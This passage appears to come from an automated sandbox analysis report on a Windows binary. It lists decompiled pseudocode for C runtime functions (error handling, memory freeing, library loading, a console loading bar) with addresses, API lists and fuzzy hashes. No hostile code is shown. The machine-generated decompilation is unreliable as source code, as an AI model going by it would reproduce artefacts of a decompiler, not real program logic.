								L00AF4D62(0);
								_t58 = _t58 + 0xc;
								goto L12;
							} else {
								L00AF8E21(_t41, _t53, __eflags,  *0xb26230, _t30);
								_push(_t48);
								goto L8;
							}
						} else {
							L00AF8E21(_t41, _t53, __eflags,  *0xb26230, _t29);
							_push(_t48);
							L8:
							L00AF4D62();
							_pop(_t41);
							goto L14;
						}
					}
				} else {
					_t48 = L00AF8DCB(_t41, _t53, _t60, _t2);
					if(_t48 == 0) {
						_t2 =  *0xb26230; // 0x6
						goto L5;
					} else {
						if(_t48 != 0xffffffff) {
							L12:
							__eflags = _t48;
							if(_t48 == 0) {
								goto L14;
							} else {
								SetLastError(_t53);
								return _t48;
							}
						} else {
							L14:
							SetLastError(_t53);
							L00AF4EBF(_t38, _t41, _t47, _t48, _t53);
							asm("int3");
							_t5 =  *0xb26230; // 0x6
							_push(_t53);
							_t63 = _t5 - 0xffffffff;
							if(_t5 == 0xffffffff) {
								L20:
								_t6 = L00AF8E21(_t41, _t53, __eflags, _t5, 0xffffffff);
								__eflags = _t6;
								if(_t6 == 0) {
									goto L29;
								} else {
									_t53 = E00AF4F03(_t41, 1, 0x364);
									_pop(_t41);
									__eflags = _t53;
									if(__eflags != 0) {
										__eflags = L00AF8E21(_t41, _t53, __eflags,  *0xb26230, _t53);
										if(__eflags != 0) {
											E00AFC3B1(_t53, _t53, 0xb27ce0);
											L00AF4D62(0);
											_t58 = _t58 + 0xc;
											goto L27;
										} else {
											L00AF8E21(_t41, _t53, __eflags,  *0xb26230, _t21);
											_push(_t53);
											goto L23;
										}
									} else {
										L00AF8E21(_t41, _t53, __eflags,  *0xb26230, _t20);
										_push(_t53);
										L23:
										L00AF4D62();
										_pop(_t41);
										goto L29;
									}
								}
							} else {
								_t53 = L00AF8DCB(_t41, _t53, _t63, _t5);
								if(_t53 == 0) {
									_t5 =  *0xb26230; // 0x6
									goto L20;
								} else {
									if(_t53 != 0xffffffff) {
										L27:
										__eflags = _t53;
										if(_t53 == 0) {
											goto L29;
										} else {
											return _t53;
										}
									} else {
										L29:
										L00AF4EBF(_t38, _t41, _t47, _t48, _t53);
										asm("int3");
										_push(_t38);
										_push(_t53);
										_push(_t48);
										_t54 = GetLastError();
										_t9 =  *0xb26230; // 0x6
										_t66 = _t9 - 0xffffffff;
										if(_t9 == 0xffffffff) {
											L36:
											_t10 = L00AF8E21(_t41, _t54, __eflags, _t9, 0xffffffff);
											__eflags = _t10;
											if(_t10 == 0) {
												goto L33;
											} else {
												_t12 = E00AF4F03(_t41, 1, 0x364);
												_pop(_t43);
												_t49 = _t12;
												__eflags = _t49;
												if(__eflags != 0) {
													__eflags = L00AF8E21(_t43, _t54, __eflags,  *0xb26230, _t49);
													if(__eflags != 0) {
														E00AFC3B1(_t54, _t49, 0xb27ce0);
														L00AF4D62(0);
														goto L43;
													} else {
														L00AF8E21(_t43, _t54, __eflags,  *0xb26230, 0);
														_push(_t49);
														goto L39;
													}
												} else {
													L00AF8E21(_t43, _t54, __eflags,  *0xb26230, 0);
													_push(0);
													L39:
													L00AF4D62();
													goto L33;
												}
											}
										} else {
											_t49 = L00AF8DCB(_t41, _t54, _t66, _t9);
											if(_t49 == 0) {
												_t9 =  *0xb26230; // 0x6
												goto L36;
											} else {
												if(_t49 != 0xffffffff) {
													L43:
													__eflags = _t49;
													if(_t49 == 0) {
														goto L33;
													} else {
														SetLastError(_t54);
													}
												} else {
													L33:
													SetLastError(_t54);
													_t49 = 0;
												}
											}
										}
										return _t49;
									}
								}
							}
						}
					}
				}
			}





















                                                  0x00afc713
                                                  0x00afc713
                                                  0x00afc713
                                                  0x00afc716
                                                  0x00afc71d
                                                  0x00afc71f
                                                  0x00afc724
                                                  0x00afc727
                                                  0x00afc741
                                                  0x00afc744
                                                  0x00afc749
                                                  0x00afc74b
                                                  0x00000000
                                                  0x00afc74d
                                                  0x00afc759
                                                  0x00afc75c
                                                  0x00afc75d
                                                  0x00afc75f
                                                  0x00afc782
                                                  0x00afc784
                                                  0x00afc79b
                                                  0x00afc7a2
                                                  0x00afc7a7
                                                  0x00000000
                                                  0x00afc786
                                                  0x00afc78d
                                                  0x00afc792
                                                  0x00000000
                                                  0x00afc792
                                                  0x00afc761
                                                  0x00afc768
                                                  0x00afc76d
                                                  0x00afc76e
                                                  0x00afc76e
                                                  0x00afc773
                                                  0x00000000
                                                  0x00afc773
                                                  0x00afc75f
                                                  0x00afc729
                                                  0x00afc72f
                                                  0x00afc733
                                                  0x00afc73c
                                                  0x00000000
                                                  0x00afc735
                                                  0x00afc738
                                                  0x00afc7aa
                                                  0x00afc7aa
                                                  0x00afc7ac
                                                  0x00000000
                                                  0x00afc7ae
                                                  0x00afc7af
                                                  0x00afc7b9
                                                  0x00afc7b9
                                                  0x00afc73a
                                                  0x00afc7ba
                                                  0x00afc7bb
                                                  0x00afc7c1
                                                  0x00afc7c6
                                                  0x00afc7c7
                                                  0x00afc7cc
                                                  0x00afc7cd
                                                  0x00afc7d0
                                                  0x00afc7ea
                                                  0x00afc7ed
                                                  0x00afc7f2
                                                  0x00afc7f4
                                                  0x00000000
                                                  0x00afc7f6
                                                  0x00afc802
                                                  0x00afc805
                                                  0x00afc806
                                                  0x00afc808
                                                  0x00afc82b
                                                  0x00afc82d
                                                  0x00afc844
                                                  0x00afc84b
                                                  0x00afc850
                                                  0x00000000
                                                  0x00afc82f
                                                  0x00afc836
                                                  0x00afc83b
                                                  0x00000000
                                                  0x00afc83b
                                                  0x00afc80a
                                                  0x00afc811
                                                  0x00afc816
                                                  0x00afc817
                                                  0x00afc817
                                                  0x00afc81c
                                                  0x00000000
                                                  0x00afc81c
                                                  0x00afc808
                                                  0x00afc7d2
                                                  0x00afc7d8
                                                  0x00afc7dc
                                                  0x00afc7e5
                                                  0x00000000
                                                  0x00afc7de
                                                  0x00afc7e1
                                                  0x00afc853
                                                  0x00afc853
                                                  0x00afc855
                                                  0x00000000
                                                  0x00afc857
                                                  0x00afc85a
                                                  0x00afc85a
                                                  0x00afc7e3
                                                  0x00afc85b
                                                  0x00afc85b
                                                  0x00afc860
                                                  0x00afc863
                                                  0x00afc864
                                                  0x00afc865
                                                  0x00afc86c
                                                  0x00afc870
                                                  0x00afc875
                                                  0x00afc878
                                                  0x00afc89f
                                                  0x00afc8a2
                                                  0x00afc8a7
                                                  0x00afc8a9
                                                  0x00000000
                                                  0x00afc8ab
                                                  0x00afc8b2
                                                  0x00afc8b8
                                                  0x00afc8b9
                                                  0x00afc8bb
                                                  0x00afc8bd
                                                  0x00afc8e0
                                                  0x00afc8e2
                                                  0x00afc8f9
                                                  0x00afc8ff
                                                  0x00000000
                                                  0x00afc8e4
                                                  0x00afc8eb
                                                  0x00afc8f0
                                                  0x00000000
                                                  0x00afc8f0
                                                  0x00afc8bf
                                                  0x00afc8c6
                                                  0x00afc8cb
                                                  0x00afc8cc
                                                  0x00afc8cc
                                                  0x00000000
                                                  0x00afc8d1
                                                  0x00afc8bd
                                                  0x00afc87a
                                                  0x00afc880
                                                  0x00afc884
                                                  0x00afc89a
                                                  0x00000000
                                                  0x00afc886
                                                  0x00afc889
                                                  0x00afc907
                                                  0x00afc907
                                                  0x00afc909
                                                  0x00000000
                                                  0x00afc90b
                                                  0x00afc90c
                                                  0x00afc90c
                                                  0x00afc88b
                                                  0x00afc88b
                                                  0x00afc88c
                                                  0x00afc892
                                                  0x00afc892
                                                  0x00afc889
                                                  0x00afc884
                                                  0x00afc899
                                                  0x00afc899
                                                  0x00afc7e1
                                                  0x00afc7dc
                                                  0x00afc7d0
                                                  0x00afc738
                                                  0x00afc733

                                                  APIs
                                                  • GetLastError.KERNEL32(00000008,?,00B06979), ref: 00AFC717
                                                  • _free.LIBCMT ref: 00AFC76E
                                                  • _free.LIBCMT ref: 00AFC7A2
                                                  • SetLastError.KERNEL32(00000000), ref: 00AFC7AF
                                                  • SetLastError.KERNEL32(00000000,00000006,000000FF), ref: 00AFC7BB
                                                  • _free.LIBCMT ref: 00AFC817
                                                  • _free.LIBCMT ref: 00AFC84B
                                                    • Part of subcall function 00AF8E21: TlsSetValue.KERNEL32(?,?), ref: 00AF8E63
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.301356316.0000000000AD1000.00000020.00020000.sdmp, Offset: 00AD0000, based on PE: true
                                                  • Associated: 00000000.00000002.301348929.0000000000AD0000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301400311.0000000000B1B000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301412690.0000000000B26000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301425684.0000000000B28000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: _free$ErrorLast$Value
                                                  • String ID:
                                                  • API String ID: 4121906797-0
                                                  • Opcode ID: d9f4ef22613161e81cf931f34309d6128c6b696bc44082e0c84cd1df7d5d86d9
                                                  • Instruction ID: f1998935303cc110cd1a8de605608f325aa020c7964d6a1431fbeae778fc4a7d
                                                  • Opcode Fuzzy Hash: d9f4ef22613161e81cf931f34309d6128c6b696bc44082e0c84cd1df7d5d86d9
                                                  • Instruction Fuzzy Hash: 7131E432D1451CA7DA2133FAAF46E7F6259AF45B70B200614FB25E71E6DF24CC1246A1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00AFA4BB, Relevance: 10.6, APIs: 7, Instructions: 80COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 88%
                                                  			E00AFA4BB(char* _a4, short** _a8) {
				int _v8;
				void* __ecx;
				void* __esi;
				int _t10;
				int _t14;
				short* _t16;
				void* _t26;
				int _t27;
				void* _t29;
				int _t35;
				intOrPtr* _t39;
				short* _t40;

				_push(_t29);
				if(_a4 != 0) {
					_t39 = _a8;
					if(_t39 != 0) {
						_push(_t26);
						L00AF8C07(_t29, _t39);
						asm("sbb ebx, ebx");
						_t35 = 0;
						_t27 = _t26 + 1;
						 *_t39 = 0;
						_t10 = MultiByteToWideChar(_t27, 0, _a4, 0xffffffff, 0, 0);
						_v8 = _t10;
						if(_t10 != 0) {
							_t40 = L00AF4D9C(_t29, _t10 + _t10);
							if(_t40 != 0) {
								if(MultiByteToWideChar(_t27, 0, _a4, 0xffffffff, _t40, _v8) != 0) {
									_t16 = _t40;
									_t40 = 0;
									_t35 = 1;
									 *_a8 = _t16;
								} else {
									E00AF69AD(GetLastError());
								}
							}
							L00AF4D62(_t40);
							_t14 = _t35;
						} else {
							E00AF69AD(GetLastError());
							_t14 = 0;
						}
					} else {
						 *((intOrPtr*)(E00AF69E3())) = 0x16;
						E00AF68BC();
						_t14 = 0;
					}
					return _t14;
				}
				 *((intOrPtr*)(E00AF69E3())) = 0x16;
				E00AF68BC();
				return 0;
			}















                                                  0x00afa4c0
                                                  0x00afa4c5
                                                  0x00afa4df
                                                  0x00afa4e4
                                                  0x00afa4fd
                                                  0x00afa4ff
                                                  0x00afa506
                                                  0x00afa508
                                                  0x00afa511
                                                  0x00afa512
                                                  0x00afa516
                                                  0x00afa51c
                                                  0x00afa521
                                                  0x00afa53b
                                                  0x00afa540
                                                  0x00afa555
                                                  0x00afa569
                                                  0x00afa56b
                                                  0x00afa56f
                                                  0x00afa570
                                                  0x00afa557
                                                  0x00afa55e
                                                  0x00afa563
                                                  0x00afa555
                                                  0x00afa573
                                                  0x00afa578
                                                  0x00afa523
                                                  0x00afa52a
                                                  0x00afa52f
                                                  0x00afa52f
                                                  0x00afa4e6
                                                  0x00afa4eb
                                                  0x00afa4f1
                                                  0x00afa4f6
                                                  0x00afa4f6
                                                  0x00000000
                                                  0x00afa57d
                                                  0x00afa4cc
                                                  0x00afa4d2
                                                  0x00000000

                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.301356316.0000000000AD1000.00000020.00020000.sdmp, Offset: 00AD0000, based on PE: true
                                                  • Associated: 00000000.00000002.301348929.0000000000AD0000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301400311.0000000000B1B000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301412690.0000000000B26000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301425684.0000000000B28000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 5aebb83cedcd2edf8f96c7049b27b49cb67ac8895fbb573d9b34d681b83c4bc5
                                                  • Instruction ID: a5458848da82f65e5e5dc7967c1cda0eadf3d2f618861e8d5d4fcaed30672cbc
                                                  • Opcode Fuzzy Hash: 5aebb83cedcd2edf8f96c7049b27b49cb67ac8895fbb573d9b34d681b83c4bc5
                                                  • Instruction Fuzzy Hash: 6611E4B290421CBBDB202FF1CD49DBB7AA8EF957B0B104218BA19E7250DA70C800C6B1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00AF8885, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E00AF8885(void* __ecx, signed int* _a4, intOrPtr _a8) {
				signed int* _v8;
				void** _t12;
				void* _t16;
				void* _t18;
				signed int _t22;
				WCHAR* _t23;
				void** _t26;
				signed int* _t29;
				void* _t32;
				void* _t34;

				_t29 = _a4;
				while(_t29 != _a8) {
					_t22 =  *_t29;
					_t12 = 0xb27bf8 + _t22 * 4;
					_t32 =  *_t12;
					_v8 = _t12;
					if(_t32 == 0) {
						_t23 =  *(0xb1d670 + _t22 * 4);
						_t32 = LoadLibraryExW(_t23, 0, 0x800);
						if(_t32 != 0) {
							L12:
							_t26 = _v8;
							 *_t26 = _t32;
							if( *_t26 != 0) {
								FreeLibrary(_t32);
							}
							L14:
							if(_t32 != 0) {
								_t16 = _t32;
								L18:
								return _t16;
							}
							L15:
							_t29 =  &(_t29[1]);
							continue;
						}
						_t18 = GetLastError();
						if(_t18 != 0x57) {
							L9:
							_t32 = 0;
							L10:
							if(_t32 != 0) {
								goto L12;
							}
							 *_v8 = _t18 | 0xffffffff;
							goto L15;
						}
						_t18 = E00B04A91(_t23, L"api-ms-", 7);
						_t34 = _t34 + 0xc;
						if(_t18 == 0) {
							goto L9;
						}
						_t18 = E00B04A91(_t23, L"ext-ms-", 7);
						_t34 = _t34 + 0xc;
						if(_t18 == 0) {
							goto L9;
						}
						_t18 = LoadLibraryExW(_t23, _t32, _t32);
						_t32 = _t18;
						goto L10;
					}
					if(_t32 == 0xffffffff) {
						goto L15;
					}
					goto L14;
				}
				_t16 = 0;
				goto L18;
			}













                                                  0x00af888e
                                                  0x00af8937
                                                  0x00af8896
                                                  0x00af8898
                                                  0x00af889f
                                                  0x00af88a1
                                                  0x00af88a6
                                                  0x00af88b3
                                                  0x00af88c8
                                                  0x00af88cc
                                                  0x00af891e
                                                  0x00af891e
                                                  0x00af8923
                                                  0x00af8927
                                                  0x00af892a
                                                  0x00af892a
                                                  0x00af8930
                                                  0x00af8932
                                                  0x00af8949
                                                  0x00af8942
                                                  0x00af8948
                                                  0x00af8948
                                                  0x00af8934
                                                  0x00af8934
                                                  0x00000000
                                                  0x00af8934
                                                  0x00af88ce
                                                  0x00af88d7
                                                  0x00af890e
                                                  0x00af890e
                                                  0x00af8910
                                                  0x00af8912
                                                  0x00000000
                                                  0x00000000
                                                  0x00af891a
                                                  0x00000000
                                                  0x00af891a
                                                  0x00af88e1
                                                  0x00af88e6
                                                  0x00af88eb
                                                  0x00000000
                                                  0x00000000
                                                  0x00af88f5
                                                  0x00af88fa
                                                  0x00af88ff
                                                  0x00000000
                                                  0x00000000
                                                  0x00af8904
                                                  0x00af890a
                                                  0x00000000
                                                  0x00af890a
                                                  0x00af88ab
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00af88b1
                                                  0x00af8940
                                                  0x00000000

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.301356316.0000000000AD1000.00000020.00020000.sdmp, Offset: 00AD0000, based on PE: true
                                                  • Associated: 00000000.00000002.301348929.0000000000AD0000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301400311.0000000000B1B000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301412690.0000000000B26000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301425684.0000000000B28000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID:
                                                  • String ID: api-ms-$ext-ms-
                                                  • API String ID: 0-537541572
                                                  • Opcode ID: d466ff4710c399b25b46713ee87954fc705d84eeb67ee66ae6125daa54761e99
                                                  • Instruction ID: 81e49570ab2a26cc163994491592b01dd4587dd65202193ce41e5aefc5eb23c0
                                                  • Opcode Fuzzy Hash: d466ff4710c399b25b46713ee87954fc705d84eeb67ee66ae6125daa54761e99
                                                  • Instruction Fuzzy Hash: 15210532A4522DBBDB318BB48C85A7A37A8AF017A0F550150FE05A7290DFB8DD01C6E2
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00B048DE, Relevance: 10.6, APIs: 7, Instructions: 65COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E00B048DE(intOrPtr _a4) {
				void* _t18;

				_t45 = _a4;
				if(_a4 != 0) {
					E00B045C4(_t45, 7);
					E00B045C4(_t45 + 0x1c, 7);
					E00B045C4(_t45 + 0x38, 0xc);
					E00B045C4(_t45 + 0x68, 0xc);
					E00B045C4(_t45 + 0x98, 2);
					L00AF4D62( *((intOrPtr*)(_t45 + 0xa0)));
					L00AF4D62( *((intOrPtr*)(_t45 + 0xa4)));
					L00AF4D62( *((intOrPtr*)(_t45 + 0xa8)));
					E00B045C4(_t45 + 0xb4, 7);
					E00B045C4(_t45 + 0xd0, 7);
					E00B045C4(_t45 + 0xec, 0xc);
					E00B045C4(_t45 + 0x11c, 0xc);
					E00B045C4(_t45 + 0x14c, 2);
					L00AF4D62( *((intOrPtr*)(_t45 + 0x154)));
					L00AF4D62( *((intOrPtr*)(_t45 + 0x158)));
					L00AF4D62( *((intOrPtr*)(_t45 + 0x15c)));
					return L00AF4D62( *((intOrPtr*)(_t45 + 0x160)));
				}
				return _t18;
			}




                                                  0x00b048e4
                                                  0x00b048e9
                                                  0x00b048f2
                                                  0x00b048fd
                                                  0x00b04908
                                                  0x00b04913
                                                  0x00b04921
                                                  0x00b0492c
                                                  0x00b04937
                                                  0x00b04942
                                                  0x00b04950
                                                  0x00b0495e
                                                  0x00b0496f
                                                  0x00b0497d
                                                  0x00b0498b
                                                  0x00b04996
                                                  0x00b049a1
                                                  0x00b049ac
                                                  0x00000000
                                                  0x00b049bc
                                                  0x00b049c1

                                                  APIs
                                                    • Part of subcall function 00B045C4: _free.LIBCMT ref: 00B045E9
                                                  • _free.LIBCMT ref: 00B0492C
                                                    • Part of subcall function 00AF4D62: HeapFree.KERNEL32(00000000,00000000,?,00AF440C), ref: 00AF4D78
                                                    • Part of subcall function 00AF4D62: GetLastError.KERNEL32(?,?,00AF440C), ref: 00AF4D8A
                                                  • _free.LIBCMT ref: 00B04937
                                                  • _free.LIBCMT ref: 00B04942
                                                  • _free.LIBCMT ref: 00B04996
                                                  • _free.LIBCMT ref: 00B049A1
                                                  • _free.LIBCMT ref: 00B049AC
                                                  • _free.LIBCMT ref: 00B049B7
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.301356316.0000000000AD1000.00000020.00020000.sdmp, Offset: 00AD0000, based on PE: true
                                                  • Associated: 00000000.00000002.301348929.0000000000AD0000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301400311.0000000000B1B000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301412690.0000000000B26000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301425684.0000000000B28000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: _free$ErrorFreeHeapLast
                                                  • String ID:
                                                  • API String ID: 776569668-0
                                                  • Opcode ID: af880634157490556b9c76908c703a8580cc2849bb7bd0e485ad11b23e9f96c6
                                                  • Instruction ID: c19d67b2071e78ec7325df68262854b1423eeda200476dda26131c03950a0fd5
                                                  • Opcode Fuzzy Hash: af880634157490556b9c76908c703a8580cc2849bb7bd0e485ad11b23e9f96c6
                                                  • Instruction Fuzzy Hash: 72111CB1540B08BBEA30BBB0CD07FDB7BDCAF55740F404955B3A9A60D2DB69B9088750
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00AD2810, Relevance: 10.6, APIs: 7, Instructions: 60COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 95%
                                                  			E00AD2810(void* __ecx, void* __edx) {
				void* _t4;
				void* _t11;
				void* _t16;
				long _t26;
				void* _t29;

				if( *0xb26020 != 0xffffffff) {
					_t26 = GetLastError();
					_t11 = L00AD2DC3(__eflags,  *0xb26020);
					__eflags = _t11 - 0xffffffff;
					if(_t11 == 0xffffffff) {
						L5:
						_t11 = 0;
					} else {
						__eflags = _t11;
						if(__eflags == 0) {
							_t4 = L00AD2DFD(__eflags,  *0xb26020, 0xffffffff);
							_pop(_t16);
							__eflags = _t4;
							if(_t4 != 0) {
								_t29 = E00AF4F03(_t16, 1, 0x28);
								__eflags = _t29;
								if(__eflags == 0) {
									L8:
									_t11 = 0;
									L00AD2DFD(__eflags,  *0xb26020, 0);
								} else {
									__eflags = L00AD2DFD(__eflags,  *0xb26020, _t29);
									if(__eflags != 0) {
										_t11 = _t29;
										_t29 = 0;
										__eflags = 0;
									} else {
										goto L8;
									}
								}
								L00AF4D62(_t29);
							} else {
								goto L5;
							}
						}
					}
					SetLastError(_t26);
					return _t11;
				} else {
					return 0;
				}
			}








                                                  0x00ad2817
                                                  0x00ad282a
                                                  0x00ad2831
                                                  0x00ad2834
                                                  0x00ad2837
                                                  0x00ad2850
                                                  0x00ad2850
                                                  0x00ad2839
                                                  0x00ad2839
                                                  0x00ad283b
                                                  0x00ad2845
                                                  0x00ad284b
                                                  0x00ad284c
                                                  0x00ad284e
                                                  0x00ad285e
                                                  0x00ad2862
                                                  0x00ad2864
                                                  0x00ad2878
                                                  0x00ad2878
                                                  0x00ad2881
                                                  0x00ad2866
                                                  0x00ad2874
                                                  0x00ad2876
                                                  0x00ad288a
                                                  0x00ad288c
                                                  0x00ad288c
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00ad2876
                                                  0x00ad288f
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00ad284e
                                                  0x00ad283b
                                                  0x00ad2897
                                                  0x00ad28a1
                                                  0x00ad2819
                                                  0x00ad281b
                                                  0x00ad281b

                                                  APIs
                                                  • GetLastError.KERNEL32(?,?,00AD22D4,00AD15A6), ref: 00AD281E
                                                  • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00AD282C
                                                  • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00AD2845
                                                  • SetLastError.KERNEL32(00000000,?,00AD22D4,00AD15A6), ref: 00AD2897
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.301356316.0000000000AD1000.00000020.00020000.sdmp, Offset: 00AD0000, based on PE: true
                                                  • Associated: 00000000.00000002.301348929.0000000000AD0000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301400311.0000000000B1B000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301412690.0000000000B26000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301425684.0000000000B28000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: ErrorLastValue___vcrt_
                                                  • String ID:
                                                  • API String ID: 3852720340-0
                                                  • Opcode ID: 7f899c5ded760e0f8069bf76c12e6a855665a0844242f0d54b61e8d80a0c3243
                                                  • Instruction ID: 0945714f76325d89bb6acec5137897973da28b26e91f705f77a7c1512b3be25c
                                                  • Opcode Fuzzy Hash: 7f899c5ded760e0f8069bf76c12e6a855665a0844242f0d54b61e8d80a0c3243
                                                  • Instruction Fuzzy Hash: DA01B5325083515EE6352B78AC85F6B3B65EF29771720022BF112522E4EF514C01F790
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00B179A0, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 40COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 76%
                                                  			E00B179A0(void* __ebx, void* __ecx, void* __edx, void* __eflags) {
				void* __edi;
				void* __esi;
				void* _t11;
				void* _t13;
				void* _t15;
				void* _t17;
				void* _t18;
				void* _t20;
				void* _t21;
				void* _t23;

				_t14 = __edx;
				_t13 = __ecx;
				E00AE3965(__ebx, __edx, _t15, _t18);
				0xb27e6c->X = 0xa0014;
				SetConsoleCursorPosition(GetStdHandle(0xfffffff5), 0xb27e6c->X);
				E00AD1080(_t13, "LOADING........", "cls");
				_push("\n\n");
				E00AD1080(_t13);
				_t23 = _t21 + 0xc;
				0xb27e6c->X = 0xb0016;
				SetConsoleCursorPosition(GetStdHandle(0xfffffff5),  *0xb27e6c);
				_t17 = 0x13;
				do {
					_t1 = E00AD9A54(_t14) + 0x64; // 0x64
					_t20 = _t1;
					do {
					} while (_t20 > E00AD9A54(_t14));
					_t11 = E00AD1080(_t13, "%c", 0xdb);
					_t23 = _t23 + 8;
					_t17 = _t17 - 1;
				} while (_t17 != 0);
				return _t11;
			}













                                                  0x00b179a0
                                                  0x00b179a0
                                                  0x00b179a7
                                                  0x00b179b5
                                                  0x00b179d0
                                                  0x00b179d7
                                                  0x00b179dc
                                                  0x00b179e1
                                                  0x00b179e6
                                                  0x00b179e9
                                                  0x00b179fe
                                                  0x00b17a00
                                                  0x00b17a05
                                                  0x00b17a0a
                                                  0x00b17a0a
                                                  0x00b17a10
                                                  0x00b17a15
                                                  0x00b17a23
                                                  0x00b17a28
                                                  0x00b17a2b
                                                  0x00b17a2b
                                                  0x00b17a32

                                                  APIs
                                                  • GetStdHandle.KERNEL32(000000F5), ref: 00B179C7
                                                  • SetConsoleCursorPosition.KERNEL32(00000000), ref: 00B179D0
                                                  • GetStdHandle.KERNEL32(000000F5), ref: 00B179FB
                                                  • SetConsoleCursorPosition.KERNEL32(00000000), ref: 00B179FE
                                                    • Part of subcall function 00AD9A54: QueryPerformanceCounter.KERNEL32(?,?,?,?,?,00B17C67), ref: 00AD9A73
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.301356316.0000000000AD1000.00000020.00020000.sdmp, Offset: 00AD0000, based on PE: true
                                                  • Associated: 00000000.00000002.301348929.0000000000AD0000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301400311.0000000000B1B000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301412690.0000000000B26000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301425684.0000000000B28000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: ConsoleCursorHandlePosition$CounterPerformanceQuery
                                                  • String ID: LOADING........$cls
                                                  • API String ID: 845668441-2250302636
                                                  • Opcode ID: f950f40d6ef6a5149d91f8c02dcf90c36b500e5c753cc788c69937c89e797937
                                                  • Instruction ID: 1f71258da1198e6aac35f5c829630629022a52d9271f45474d058175c42ed23a
                                                  • Opcode Fuzzy Hash: f950f40d6ef6a5149d91f8c02dcf90c36b500e5c753cc788c69937c89e797937
                                                  • Instruction Fuzzy Hash: EEF0CD73D4415465CA30B7A5BD06D8A3998DF49764B464191F118232B2DEB059498B71
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00B0093C, Relevance: 9.3, APIs: 6, Instructions: 273COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • __allrem.LIBCMT ref: 00B00AC6
                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00B00AE2
                                                  • __allrem.LIBCMT ref: 00B00AF9
                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00B00B17
                                                  • __allrem.LIBCMT ref: 00B00B2E
                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00B00B4C
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.301356316.0000000000AD1000.00000020.00020000.sdmp, Offset: 00AD0000, based on PE: true
                                                  • Associated: 00000000.00000002.301348929.0000000000AD0000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301400311.0000000000B1B000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301412690.0000000000B26000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301425684.0000000000B28000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                  • String ID:
                                                  • API String ID: 1992179935-0
                                                  • Opcode ID: fa4a4711b2c80aca952a967196ba22a9383e1263a886d1e3422cfe420c5c00d9
                                                  • Instruction ID: c7a72adb557f75f37f71ac8a56ee955c014e8b5d4406c181117b9321d0bff1b4
                                                  • Opcode Fuzzy Hash: fa4a4711b2c80aca952a967196ba22a9383e1263a886d1e3422cfe420c5c00d9
                                                  • Instruction Fuzzy Hash: B581FB71A107069BE720BF6CCC82B6A7BE8EF44764F1485ADF515D72D2EBB0D9408790
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00B0942D, Relevance: 9.2, APIs: 6, Instructions: 197COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,00B027F4,00000000,?,?,?,00B09647,?,?,00000100), ref: 00B09487
